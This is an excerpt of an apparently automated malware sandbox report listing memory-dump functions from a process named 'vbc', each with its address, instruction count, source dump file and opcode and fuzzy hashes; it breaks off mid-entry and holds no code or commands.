                                                                                                                                                  • Instruction Fuzzy Hash: 5411E1326041469FC300CF59D800BA6FBBAFB4A354F088559E949CB311E732E9C0CBB0
                                                                                                                                                  Function 05C4208A Relevance: .0, Instructions: 50COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                  • Instruction ID: eb185198267a9481c1b7f60f9a43d33a010efd0c86bf29cd00839b2a685ba2a9
                                                                                                                                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                  • Instruction Fuzzy Hash: D301F1363001009BDF259E2AD884FB277A7BFC4710F1548AAFC02CF245DAB1C981DBA0
                                                                                                                                                  Function 05CC6050 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 011e77503f94554f767445d8ebccdb7f02af99460cbe65dcb89d1647ebb59ad4
                                                                                                                                                  • Instruction ID: a27953eba6b5bd79f13cc3b080a7f186f07ed71ec4e3c5bc6611a5e883df3fc8
                                                                                                                                                  • Opcode Fuzzy Hash: 011e77503f94554f767445d8ebccdb7f02af99460cbe65dcb89d1647ebb59ad4
                                                                                                                                                  • Instruction Fuzzy Hash: A7111772900019ABCB11DB98CC84DEFBB7DEF48258F044566E916A7210EA34AA55CBE0
                                                                                                                                                  Function 05D14D30 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c18ad6b36a89cf115a3e7b686dd114045f6aa450575767d255f290452dad8930
                                                                                                                                                  • Instruction ID: 7d87dea90852333d3829f24a0f9e7d957148aecf48bd4554100cb189be604132
                                                                                                                                                  • Opcode Fuzzy Hash: c18ad6b36a89cf115a3e7b686dd114045f6aa450575767d255f290452dad8930
                                                                                                                                                  • Instruction Fuzzy Hash: 87014C72A14158BBCF11DFADDD45EAFBFB9EB48650F040066F515E7211CA30DA11DBA0
                                                                                                                                                  Function 05C7E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 74e4c0ac71b3d7252ebe2667383899b1291009313e45c8418a14c87a5f156ea5
                                                                                                                                                  • Instruction ID: 8d3216026dd4038d78018c37cd51781f39dd7d93943f9a354c5b4c5cb9c1b0cb
                                                                                                                                                  • Opcode Fuzzy Hash: 74e4c0ac71b3d7252ebe2667383899b1291009313e45c8418a14c87a5f156ea5
                                                                                                                                                  • Instruction Fuzzy Hash: BB01A272701A44BFD711ABB9CD88E57B7ECFF896A0B000E26B90583651DB74EC41D6E4
                                                                                                                                                  Function 05C820F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8454b29ed4d2224677d070cdee1b87a5cd1946021705a86300798ef51c7adf53
                                                                                                                                                  • Instruction ID: f8c30876bb63dbe425e9d966201d4e695b72c21f9f73f8bad5d4d781208dc5b2
                                                                                                                                                  • Opcode Fuzzy Hash: 8454b29ed4d2224677d070cdee1b87a5cd1946021705a86300798ef51c7adf53
                                                                                                                                                  • Instruction Fuzzy Hash: 1F11AD35A0020CEBDF04EFA4C849EAE7BB6FB44244F104459F9029B280EA35AE01CB90
                                                                                                                                                  Function 05C3C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                  • Instruction ID: 0d93698778710539632e0c315468c6995e606549a0966a26822ad2eac5d52b2d
                                                                                                                                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                  • Instruction Fuzzy Hash: BC012872204748AFDF22DA66D808FAB73EAFFC4250F044C1AA9879B540DE74E901CB60
                                                                                                                                                  Function 05CCC460 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9464b7507f70859d18dd6c3131d1467d811b54d839bd512167ca201776f71a17
                                                                                                                                                  • Instruction ID: 30e15c7f633fc164e10c1a74e345ff88fc92a6db3451af602792f66381318350
                                                                                                                                                  • Opcode Fuzzy Hash: 9464b7507f70859d18dd6c3131d1467d811b54d839bd512167ca201776f71a17
                                                                                                                                                  • Instruction Fuzzy Hash: 8C115B71A00209ABCF05EFA8C855EBE7BB6FB48354F008499F81697340DA34EE51DB90
                                                                                                                                                  Function 05C5E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                  • Instruction ID: f2fa1bebb99498c8e97660aa69378801d4bf3c0cfd2657e746e026f9a72466ca
                                                                                                                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                  • Instruction Fuzzy Hash: EA017C32204580DFD726CA5DC94CF3677EDFB84B60F0908A5F806CB691D638DE80C629
                                                                                                                                                  Function 05C3826B Relevance: .0, Instructions: 46COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0be40800f2ae6de900173846149d40c5fb2da609e8fd201335e9ea87417c821e
                                                                                                                                                  • Instruction ID: 9a0d88f3f28c045bfb06edca75a05d9f604177169add9d05edf4c4b7e7ff2c1b
                                                                                                                                                  • Opcode Fuzzy Hash: 0be40800f2ae6de900173846149d40c5fb2da609e8fd201335e9ea87417c821e
                                                                                                                                                  • Instruction Fuzzy Hash: 8301F231B15608DFC704FB6ADD4A9AE7BB9FF80614F19486AF802A7340EE30DD01C690
                                                                                                                                                  Function 05CC4C0F Relevance: .0, Instructions: 46COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8d22fd0f695caf0e40b33c7a3b92b647483dcd0cba3f5e7e859be9ecba0e11dc
                                                                                                                                                  • Instruction ID: f81280c26114a9cfb683de4ebfefe02bffcf377a33061bfeae288d12bb4c1f4d
                                                                                                                                                  • Opcode Fuzzy Hash: 8d22fd0f695caf0e40b33c7a3b92b647483dcd0cba3f5e7e859be9ecba0e11dc
                                                                                                                                                  • Instruction Fuzzy Hash: C201F2B2B00301ABCF109F98D9C0B5ABFFCAB84B90F10046AEA0497300C7B0DD4497A4
                                                                                                                                                  Function 05C42582 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 41c802b9a8f2d6b41602e741b1597b2a93c80f62b3f4f1e258e2842dee9eea13
                                                                                                                                                  • Instruction ID: 1b724e564c1b68af8885fd425ffb90f540109ba044433f9368d8735a189b5e30
                                                                                                                                                  • Opcode Fuzzy Hash: 41c802b9a8f2d6b41602e741b1597b2a93c80f62b3f4f1e258e2842dee9eea13
                                                                                                                                                  • Instruction Fuzzy Hash: E6F0F432741A50BBC732DF968C44F17BAAAEBC4FA0F104829BA0597640CA34ED01DBA0
                                                                                                                                                  Function 05D14F68 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9173e9365f417f1d1dd5565a5543d1e9106ad236de967f451d976b23e55c788a
                                                                                                                                                  • Instruction ID: 257ed62e0c7b05e50b8e871773719d5240d1b9fe1f1b49db363017a43e2900db
                                                                                                                                                  • Opcode Fuzzy Hash: 9173e9365f417f1d1dd5565a5543d1e9106ad236de967f451d976b23e55c788a
                                                                                                                                                  • Instruction Fuzzy Hash: 420129B1A10259ABCB04DFA9E9459AEBBF8FF48704F10445AF901E7380DB74DA01CBA4
                                                                                                                                                  Function 05C6C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                  • Instruction ID: 62d57fe1872a4e50eaa627ff012afd984c6d465c4789ab654371d282c9a957d6
                                                                                                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                  • Instruction Fuzzy Hash: 86F0C2B2600610ABD335CF8DDC40E67F7EAEBC4A90F048528A546C7220EA31EE04CB90
                                                                                                                                                  Function 05D1634F Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3eb1e93591b5c6d66e4ae6ef19be32909f8251ba46c643edb2ec895da54158e5
                                                                                                                                                  • Instruction ID: 5e16fe7b769fa196eb7a0837a8640ef7adb07d47de1ada4d7f747f10218e70dd
                                                                                                                                                  • Opcode Fuzzy Hash: 3eb1e93591b5c6d66e4ae6ef19be32909f8251ba46c643edb2ec895da54158e5
                                                                                                                                                  • Instruction Fuzzy Hash: 10017171A10249ABCB04DFA9E8459AEB7B8FF48704F10441AF901E7350D634DA00DBA4
                                                                                                                                                  Function 05C3C310 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                  • Instruction ID: 59eeda67a57120623ee070d0c9b7dae0dd2558b7217d7b9ba5c55d1f18385b2d
                                                                                                                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                  • Instruction Fuzzy Hash: E1F021333446369BC7725659C845FBFA6969FC5AA4F190835F506BB204CD74CC01A7D1
                                                                                                                                                  Function 05D162D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 84e3085ac2cb795e55cd4555c05b3fb0c861edb4c04fac59d8dcb425b992a234
                                                                                                                                                  • Instruction ID: 4be9b803d968c228b51b4c028909b144884bf20779a8cb665b03668ded339878
                                                                                                                                                  • Opcode Fuzzy Hash: 84e3085ac2cb795e55cd4555c05b3fb0c861edb4c04fac59d8dcb425b992a234
                                                                                                                                                  • Instruction Fuzzy Hash: DD017171A10209ABCB04DFA9E8459AEBBB8EF48704F50441AF901E7350D674D900CBA4
                                                                                                                                                  Function 05D1625D Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 168921c248a1b926b192f93e2a218a99fd4c1b6b425b683eb910ab330be828ed
                                                                                                                                                  • Instruction ID: fe6e90f8baaa28a5d1d64ad93945cc34aad1797093bcdde5f910cb2f64cc777c
                                                                                                                                                  • Opcode Fuzzy Hash: 168921c248a1b926b192f93e2a218a99fd4c1b6b425b683eb910ab330be828ed
                                                                                                                                                  • Instruction Fuzzy Hash: 1A018471A10249EFCB04DFA9D8459AEB7F8FF48704F10441AF901EB350D674D900CBA4
                                                                                                                                                  Function 05D14FE7 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e57e3a42a283b8771823dca16f0fd227bb121e7d9ea09d0f894c719978caf14d
                                                                                                                                                  • Instruction ID: 39d7b32a19d916d940efae66a0ab6d124797c106efd72b9dc7b07a0c01edb9ff
                                                                                                                                                  • Opcode Fuzzy Hash: e57e3a42a283b8771823dca16f0fd227bb121e7d9ea09d0f894c719978caf14d
                                                                                                                                                  • Instruction Fuzzy Hash: 72012CB1A10249AFDB04DFA9E9859EEBBB8FF48754F10445AF901E7340D634EA018BA4
                                                                                                                                                  Function 05D161E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 10971c53306420e868c7f3d9bc3d3fa6c9fd87ab5be1169c7bb7a995fcf59394
                                                                                                                                                  • Instruction ID: 5e94de031cd186ebe91d734d3dddcd05c27891ec76279c20bfc99f5259690565
                                                                                                                                                  • Opcode Fuzzy Hash: 10971c53306420e868c7f3d9bc3d3fa6c9fd87ab5be1169c7bb7a995fcf59394
                                                                                                                                                  • Instruction Fuzzy Hash: 28018471A10249ABCB04DFA9D845AEEBBB8FF48714F14045AF901AB380D734DA01CB58
                                                                                                                                                  Function 05CC63C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                  • Instruction ID: 8f9ce36c2117012f1cebc572781a607dff972981e82392aa9ef6dbf01d04154c
                                                                                                                                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                  • Instruction Fuzzy Hash: 9BF0367220001DBFEF019F94DD80DAF7B7DEF456D8B104565FA1196160D631DD61E7A0
                                                                                                                                                  Function 05CCA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 08f3011ef560ef71ad641c8e9ebe45872c82ce8b33d6fcb3c85734b795abfa2c
                                                                                                                                                  • Instruction ID: 87ce46f9ea9b6551cb46fab001593398dcdb47e91579c67c634f22b997c78744
                                                                                                                                                  • Opcode Fuzzy Hash: 08f3011ef560ef71ad641c8e9ebe45872c82ce8b33d6fcb3c85734b795abfa2c
                                                                                                                                                  • Instruction Fuzzy Hash: 4501973611010DABCF129F84DC44EDE7FA6FB4C764F068655FE1966220C632E970EB81
                                                                                                                                                  Function 05C7656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2a1dc230f97e0f60300b4b0cd6a8d271d7c7e4509d24b148499ec1d3ae7c396a
                                                                                                                                                  • Instruction ID: 6769d3f5a7f6bf01d0f2bd1136698f3a8392ba03cf4d4ef766632e3bb91d28e7
                                                                                                                                                  • Opcode Fuzzy Hash: 2a1dc230f97e0f60300b4b0cd6a8d271d7c7e4509d24b148499ec1d3ae7c396a
                                                                                                                                                  • Instruction Fuzzy Hash: 1701D670308A85CBE7269B6DDD4CF6537A6BB00B40F080D90B9028BBD2D7A8D5809214
                                                                                                                                                  Function 05C3C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f3a61d1bd237f33ebf3a5060e5c2a86abcb7aa39d4ef10ce6eae5ecb43c1b894
                                                                                                                                                  • Instruction ID: 2fa1e2934d84a1cc6dc4060e37020a1728007a71a2b017cd42c8ef5102e4f31e
                                                                                                                                                  • Opcode Fuzzy Hash: f3a61d1bd237f33ebf3a5060e5c2a86abcb7aa39d4ef10ce6eae5ecb43c1b894
                                                                                                                                                  • Instruction Fuzzy Hash: 0AF024B23042045BF7149616CC43F3633EAFFC0650FA5882AEA059B2C0E970DD01A3D8
                                                                                                                                                  Function 05CE437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                  • Instruction ID: 05850024ff724d29d05dde3b2f020ef403ebfb7ef09a7b81f29e4f6acf30bca3
                                                                                                                                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                  • Instruction Fuzzy Hash: 5BF02E39385D1347DF7DAE2A8494B2EB256BFC0D10B152D3C9442CB640DF50DD00D7A0
                                                                                                                                                  Function 05CC8D20 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a6a11bc012f348cdc346ec36df971f9dc270db96c2cdaa985c17660f36ce58f2
                                                                                                                                                  • Instruction ID: 059e1819ac994b5e8ecb9d82832971435a5ea9793894fd5d91e973b3e7ed85f4
                                                                                                                                                  • Opcode Fuzzy Hash: a6a11bc012f348cdc346ec36df971f9dc270db96c2cdaa985c17660f36ce58f2
                                                                                                                                                  • Instruction Fuzzy Hash: 9AF0B4765182456BDB216B1CE889F5BBF6DFB94710F89086EF846273518A746D80CB80
                                                                                                                                                  Function 05C447FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: db3132cee4d51eff2f25064e310e2c068337300072fca78e0eee4276b9c1029d
                                                                                                                                                  • Instruction ID: 410acc39301f711d9412a91820482b64ca2023db50ec5efbf1991b9adcced1e5
                                                                                                                                                  • Opcode Fuzzy Hash: db3132cee4d51eff2f25064e310e2c068337300072fca78e0eee4276b9c1029d
                                                                                                                                                  • Instruction Fuzzy Hash: 4BF0B4319166D09FDF35CB68C0C8F21B7D6AB01674F284D6AD88AC7901C735DA80CE54
                                                                                                                                                  Function 05D00115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2e524d60a8eed5e892d7f6e739348b6d7280739401d44a669665661d9ea0022e
                                                                                                                                                  • Instruction ID: 7a6a2ab3bc69884afd1149b2ba196f65904067702aaf94a135a2b579e9968045
                                                                                                                                                  • Opcode Fuzzy Hash: 2e524d60a8eed5e892d7f6e739348b6d7280739401d44a669665661d9ea0022e
                                                                                                                                                  • Instruction Fuzzy Hash: 03F0276A52FA80B6CB215B2C649E7A12F66A741024F4A288BD5A5DB340CA78C483C332
                                                                                                                                                  Function 05C7C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
